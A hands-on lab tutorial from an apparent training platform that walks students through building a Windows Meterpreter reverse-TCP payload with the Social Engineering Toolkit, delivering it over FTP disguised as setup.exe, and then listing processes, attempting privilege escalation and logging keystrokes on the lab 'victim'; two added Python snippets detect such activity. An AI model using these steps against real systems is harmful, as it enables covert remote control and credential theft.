Social engineering


Exercise 1 - Use the Social Engineering Toolkit (SET) in Kali Linux

With a little skill, you can always break someone's password using methods such as a brute-force or dictionary attack. However, it is much easier to trick someone into simply sharing the password with you without them even knowing that they have shared it. You can also control their system without their knowledge, but you must trick them into installing something or opening a file that contains a specific payload. When you trick people into sharing their confidential information or running a malicious file or payload, you are performing a social engineering attack: the art of manipulating people into performing a task that allows you to gain their confidential information or even control their system.

Please refer to your course material or use your favorite search engine to research for more information about this topic.

Task 1 - Create an Exploit

You can perform social engineering using various methods, from simply talking to people and tricking them to more sophisticated methods with the help of the Social Engineering Toolkit (SET), a Python-driven suite of custom tools that focuses on attacking the human element.

Important: SET provides many tools. In this task, you will focus on specific tools but in your spare time, you are free to try all these tools to enhance your learning.

To use the SET, perform the following steps:

Step 1

Ensure you have powered on the required devices and connect to PLABKALI01.

Type root in the Username field.

Figure 1.1 Screenshot of PLABKALI01: Typing root into the username field on the login screen.

When prompted, type the following password in the Password field:

Passw0rd

Click Sign In.

Figure 1.2 Screenshot of PLABKALI01: Entering the password in the Password text box and then clicking Sign In.

Ensure that you have logged into the Kali Linux system.

Figure 1.3 Screenshot of PLABKALI01: Showing the taskbar that is correctly displayed once the viewer has been moved.

Step 2

You can start SET either from the menu or from the command prompt. To start from the menu, click the first icon from the task bar, select Exploitation Tools, and then select social engineering toolkit.

In this lab, you will use a command to start SET. On the toolbar, double-click Root Terminal.

Figure 1.4 Screenshot of PLABKALI01: Double-clicking the Root Terminal icon.

Step 3

The terminal window is displayed. Enter the following command and press Enter:

setoolkit

Figure 1.5 Screenshot of PLABKALI01: Executing the setoolkit command.

Step 4

If you are using SET for the first time, you need to accept the terms of service. Type the following letter and press Enter.

y

Figure 1.6 Screenshot of PLABKALI01: Accepting the terms of service to start the Social Engineering Toolkit (SET).

Step 5

You are now on the main menu, which displays multiple options. Each option performs a specific task; for example, option 5 updates the Social Engineering Toolkit.

To continue with this lab, you will need to select the 1) Social-Engineering Attacks option. Type the following number and press Enter:

1

Figure 1.7 Screenshot of PLABKALI01: Selecting option 1 to choose the Social-Engineering Attacks.

Step 6

Next, you will see another menu that relates to the Social-Engineering Attacks option. Out of the given choices, choose 4) Create a Payload and Listener. Type the following number and press Enter:

4

Figure 1.8 Screenshot of PLABKALI01: Selecting option 4 to create a payload and listener.

Step 7

Next, you will be prompted to select a payload. Out of the given choices, choose 5) Windows Meterpreter Reverse_TCP X64. Type the following number and press Enter:

5

Figure 1.9 Screenshot of PLABKALI01: Selecting option 5 to choose the Windows Meterpreter Reverse payload.

Step 8

You will be prompted to provide the IP address for the payload listener. This is the IP address of your own system, the Kali Linux machine. In this lab environment, the IP address of the Kali Linux machine is 192.168.0.3.

For the IP address for the payload listener option, enter the following IP address and press Enter:

192.168.0.3

Note: In a real environment, you will have a different IP address; the address above applies only to this lab environment. If you do not know the IP address of your Kali Linux system, open another terminal window and run ifconfig. If you know the network adapter name, you can run ifconfig eth0, where eth0 is the name of the network adapter; check your system for the actual adapter name.

Figure 1.10 Screenshot of PLABKALI01: Entering the IP address of the Kali Linux system for the payload listener.

Step 9

Next, you will be prompted to enter the port number. Type the following port number in the Enter the PORT for the reverse listener option and press Enter:

443

Figure 1.11 Screenshot of PLABKALI01: Entering the port number for the reverse listener.

Step 10

Notice that the process of backdooring a legitimate executable starts. The executable is packaged in a manner designed to evade antivirus detection. After the executable is created, it is stored in the /root/.set directory. The default file name is payload.exe, which you will change after transporting it to the victim's system.

You are now prompted to start the payload and listener. Type the following and press Enter:

yes

Figure 1.12 Screenshot of PLABKALI01: Entering yes to start the payload and listener.

The Metasploit Framework now starts. You are now ready for the next stage: sharing the payload with the victim and then capturing information when the victim executes it.

Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window open. Do NOT shut it down or exit from it.

You are now at the msf exploit (handler) prompt.

Figure 1.13 Screenshot of PLABKALI01: Showing the successful start of the payload handler.

Task 2 - Setup the FTP Server

After you have created the payload, you need to share it with the victim. In a real environment, you will have different methods of transporting this payload to the victim's system. For example, some of the common transport methods are:

  • E-mail - attach the payload to an e-mail and send it to the victim.
  • USB - copy the payload to a USB drive; when the victim plugs the drive into the system, the payload can be triggered.
  • Download - keep the infected file in a download repository from which the victim downloads the payload.
  • FTP - share it through FTP, making it look like a legitimate file.

In this task, you will set up an FTP server and share the file with the victim.

To set up the FTP server, perform the following steps:

Step 1

Ensure that you have logged into the Kali Linux system and that the Metasploit window is open. Notice that the payload handler is running.

Figure 1.14 Screenshot of PLABKALI01: Showing the successful start of the payload handler.

Step 2

Next, you need to set up an FTP server. There are multiple options: you can either set up an independent FTP server or use Metasploit's auxiliary FTP server module. To set up the FTP server, type the following command and press Enter:

use auxiliary/server/ftp

Figure 1.15 Screenshot of PLABKALI01: Starting Metasploit's auxiliary FTP server.

Step 3

Notice that the command prompt has now changed to msf auxiliary(ftp). You now need to set the FTP root directory. To do this, type the following command and press Enter:

set FTPROOT /root/.set/

Figure 1.16 Screenshot of PLABKALI01: Setting the FTPROOT directory of the FTP server.

Step 4

Next, you need to type the following command and press Enter:

exploit

Note: If you miss this step, you will not be able to connect to the FTP server; this is a critical step.

Figure 1.17 Screenshot of PLABKALI01: Initiating the auxiliary module execution.

Step 5

Connect to PLABWIN10.

Note: Do not close the Metasploit window.

Figure 1.18 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.

Leave the devices you have powered on in their current state and proceed to the next task.

Task 3 - Download the Payload

After you have set up the FTP server, you next need to download the file onto the victim's system. You do not need a dedicated FTP client to download the file; in this task, you will use the Windows command prompt to connect to the FTP server.

Note: In a real environment, you will probably not be the one downloading the file onto the victim's system; you will convince the victim to download it. For the sake of completing this exercise, you will download the file from the FTP server to the victim's system yourself.

To download the payload, perform the following steps:

Step 1

Ensure that you have logged into PLABWIN10.

Figure 1.19 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.

Step 2

Right-click the Windows icon and select Run.

Figure 1.20 Screenshot of PLABWIN10: Selecting the Run option from the menu.

Step 3

The Run dialog box is displayed. In the Open textbox, type the following and press Enter:

cmd

Alternatively, you can click OK.

Figure 1.21 Screenshot of PLABWIN10: Showing the Run dialog box with the cmd command in the Open textbox.

Step 4

The command prompt window is displayed. You will now connect to the FTP server and download the file.

To connect to the FTP server, type the following command and press Enter:

ftp 192.168.0.3

Figure 1.22 Screenshot of PLABWIN10: Using the command prompt to connect to the FTP server 192.168.0.3.

Step 5

You are now connected to the FTP server. You will now authenticate as the anonymous user. Type the following name at the User prompt and press Enter:

anonymous

Figure 1.23 Screenshot of PLABWIN10: Entering the user name anonymous to connect to the FTP server.

Step 6

Next, you are prompted for the password. Leave it blank and press Enter.

Figure 1.24 Screenshot of PLABWIN10: Entering the password to authenticate the anonymous user.

You are now successfully authenticated to the FTP server.

Figure 1.25 Screenshot of PLABWIN10: Showing the successful connection to the FTP server 192.168.0.3.

Step 7

You now need to list the files on the FTP server. To do this, type the following command and press Enter:

dir

Notice that payload.exe is present on the FTP server.

Figure 1.26 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.3.

Step 8

Now, set the transfer mode to binary. Type the following command and press Enter:

binary

Type is now set to binary.

Figure 1.27 Screenshot of PLABWIN10: Setting the TYPE to binary.

Step 9

Next, transfer the file to the victim's system. Type the following command and press Enter:

get payload.exe

Notice that the transfer is successful.

Figure 1.28 Screenshot of PLABWIN10: Downloading the payload.exe file using the get command.

Step 10

You can now safely close the FTP session. Type the following command and press Enter:

quit

Notice that the FTP prompt is no longer available. You are back at the command prompt.

Figure 1.29 Screenshot of PLABWIN10: Closing the session with the FTP server using the quit command.
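The FTP exchange in steps 4 to 10 travels in plaintext, so a defender who captures the control channel can reconstruct exactly what was fetched and by whom. The Python below is an added example, not part of the lab and not Metasploit's code; it assumes a constructed transcript format (`C:` for client commands, `S:` for server replies with their reply codes) and an assumed list of executable file suffixes.

```python
"""Reconstruct an FTP control-channel dialog and flag sessions in which an
anonymous login retrieves an executable, the exchange the Windows ftp client
performs above (USER anonymous, blank PASS, TYPE I, RETR payload.exe).
Transcript format is constructed: 'C:' lines are client commands, 'S:' lines
are server replies carrying their three-digit reply codes."""
from typing import Dict, List

EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".msi", ".ps1", ".bat")  # assumed

def parse_transcript(lines: List[str]) -> Dict[str, object]:
    """Walk the dialog once, tracking login user, transfer type and retrievals."""
    state = {"user": None, "logged_in": False, "binary": False, "retrieved": []}
    pending = None                     # file named in a RETR awaiting its 226 reply
    for raw in lines:
        side, _, text = raw.partition(" ")
        if side == "C:":
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                state["user"] = arg.strip()
            elif verb == "TYPE":
                state["binary"] = arg.strip().upper() == "I"
            elif verb == "RETR":
                pending = arg.strip()
        elif side == "S:":
            code = text[:3]
            if code == "230":          # login accepted
                state["logged_in"] = True
            elif code == "226" and pending:   # data transfer completed
                state["retrieved"].append(pending)
                pending = None
            elif code[:1] in ("4", "5"):      # command failed, nothing transferred
                pending = None
    return state

def anonymous_executable_downloads(lines: List[str]) -> List[str]:
    """Names of executable-looking files fetched by an anonymous session."""
    s = parse_transcript(lines)
    if not s["logged_in"] or str(s["user"]).lower() not in ("anonymous", "ftp"):
        return []
    return [f for f in s["retrieved"] if f.lower().endswith(EXECUTABLE_SUFFIXES)]

SAMPLE_SESSION = [  # constructed; mirrors the lab exchange with 192.168.0.3
    "S: 220 FTP Server Ready", "C: USER anonymous", "S: 331 Password required",
    "C: PASS ", "S: 230 Login OK", "C: TYPE I", "S: 200 Type set to I",
    "C: RETR payload.exe", "S: 150 Opening BINARY mode data connection",
    "S: 226 Transfer complete", "C: QUIT", "S: 221 Goodbye",
]
```

Running `anonymous_executable_downloads(SAMPLE_SESSION)` returns `['payload.exe']`; a failed RETR (a 4xx or 5xx reply) is not counted as a retrieval.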

Step 11

Open Windows Explorer from the taskbar and navigate to the following path:

C:\Users\administrator.PRACTICELABS

Notice that the payload.exe file is present.

Figure 1.30 Screenshot of PLABWIN10: Showing the successful download of payload.exe on the Windows system.

Step 12

Move the file to the Downloads folder by dragging it. You should then see the file in the Downloads folder.

Figure 1.31 Screenshot of PLABWIN10: Moving the file, payload.exe, to the Downloads folder.

Step 13

Navigate to the Downloads folder. Notice that payload.exe is now present in this folder.

Figure 1.32 Screenshot of PLABWIN10: Showing the file, payload.exe, in the Downloads folder.

Step 14

After the file is moved, rename the file to setup.exe. Then, double-click the file to execute it.

Figure 1.33 Screenshot of PLABWIN10: Renaming the file, payload.exe, to setup.exe.

Quickly switch back to PLABKALI01. Notice that a connection from the victim's system has already been opened.

Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window open. Do NOT shut it down or exit from it.

Figure 1.34 Screenshot of PLABKALI01: Showing a successful connection with the victim's system after the payload.exe file is executed.
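The callback shown in Figure 1.34 leaves a host-side trace on the victim: a freshly downloaded executable in the Downloads folder opening an outbound connection to 192.168.0.3 on port 443. The Python below is an added detection example, not part of the lab and not SET or Metasploit code; the Sysmon-style key=value event lines, the list of user-writable folders and the port-443 process allowlist are constructed assumptions.

```python
"""Flag outbound connections opened by executables that run from user-writable
folders: the host-side footprint left when a staged payload (payload.exe, renamed
to setup.exe in Downloads) calls back to a reverse-TCP listener on port 443.
Input: Sysmon-style network-connection events (Event ID 3) flattened to
key=value pairs. All sample lines are constructed for this example."""
import re
from typing import Dict, List

# Folders a standard user can write to (assumed list, not exhaustive).
USER_WRITABLE = [
    re.compile(r"\\users\\[^\\]+\\downloads\\"),
    re.compile(r"\\users\\[^\\]+\\appdata\\local\\temp\\"),
    re.compile(r"\\users\\public\\"),
]
# Processes expected to talk to port 443 all day (assumed allowlist).
EXPECTED_443_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line: str) -> Dict[str, str]:
    """Turn 'Key=value Key="quoted value"' into a dict."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}

def classify(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks suspicious (empty list = benign)."""
    reasons: List[str] = []
    if ev.get("EventID") != "3" or ev.get("Initiated", "").lower() != "true":
        return reasons                   # only outbound connections matter here
    image = ev.get("Image", "").lower()
    exe = image.rsplit("\\", 1)[-1]
    if any(p.search(image) for p in USER_WRITABLE):
        reasons.append("outbound connection from user-writable path")
    if ev.get("DestinationPort") == "443" and exe not in EXPECTED_443_CLIENTS:
        reasons.append("unexpected process using port 443")
    return reasons

def find_suspicious(lines: List[str]) -> List[Dict[str, str]]:
    hits = []
    for ev in map(parse_event, lines):
        reasons = classify(ev)
        if reasons:
            hits.append({"image": ev["Image"], "reasons": "; ".join(reasons),
                         "dest": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'})
    return hits

SAMPLE_EVENTS = [  # constructed; mirrors the lab: setup.exe -> 192.168.0.3:443
    'EventID=3 Image="C:\\Users\\administrator.PRACTICELABS\\Downloads\\setup.exe" '
    'Initiated=true Protocol=tcp DestinationIp=192.168.0.3 DestinationPort=443',
    'EventID=3 Image="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" '
    'Initiated=true Protocol=tcp DestinationIp=203.0.113.10 DestinationPort=443',
    'EventID=3 Image="C:\\Windows\\System32\\svchost.exe" '
    'Initiated=true Protocol=tcp DestinationIp=203.0.113.20 DestinationPort=80',
]
```

On the sample, only the setup.exe event is reported, with both reasons; the browser and svchost events pass.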

Task 4 - Exploit the Victim’s System

The payload is now running on the victim's system. You now need to exploit it.

To exploit the victim's system, perform the following steps:

Step 1

Ensure that you are connected to PLABKALI01. You now need to open the session with the victim's system.

Type the following command and press Enter:

sessions -i 1

The session is now successfully established.

Figure 1.35 Screenshot of PLABKALI01: Showing a successful connection with the victim's system after the payload.exe file is executed.

Step 2

Notice that interaction with the victim's system has now started; you are now effectively controlling it. Let's see the processes that are running on the victim's system.

Type the following command and press Enter:

ps

Notice that the processes running on the victim's system are now displayed. Note the last running process, setup.exe, which is the payload that you executed on the victim's system.

Figure 1.36 Screenshot of PLABKALI01: Listing the running processes on the victim's system.

Step 3

Next, you need to escalate privileges. Type the following command and press Enter:

getsystem

Notice the result: it shows that privilege escalation failed.

Figure 1.37 Screenshot of PLABKALI01: Executing the getsystem command to escalate privileges on the victim's system.

Step 4

Let's now check whether the victim's system has a webcam and take a picture. To check this, type the following command and press Enter:

webcam_snap

Notice the output, which states that the victim's system does not have a webcam.

Figure 1.38 Screenshot of PLABKALI01: Attempting to use the webcam on the victim's system to take a picture.

Step 5

Let’s try to capture the keystrokes on the victim’s system. Type the following command and press Enter:

keyscan_start

Notice that the sniffer has now started.

Figure 1.39 Screenshot of PLABKALI01: Starting the keystroke sniffer on the victim's system.

Step 6

Let’s now see the keys that have been pressed on the victim’s system. Type the following command and press Enter:

keyscan_dump

Notice that several keys were pressed since the sniffer started.

Figure 1.40 Screenshot of PLABKALI01: Capturing the keystrokes on the victim's system.

Step 7

Since the privilege escalation failed, you can try to do something else with the system. First, let’s background the session.

Type the following command and press Enter:

background

Notice that the session is now running in the background. From here, you can run more exploits if you wish; there are many options available, which you can explore in your free time.

Figure 1.41 Screenshot of PLABKALI01: Putting the session into the background.

Shut down all virtual machines used in this lab before proceeding to the next module. Alternatively, you can log out of the lab platform.
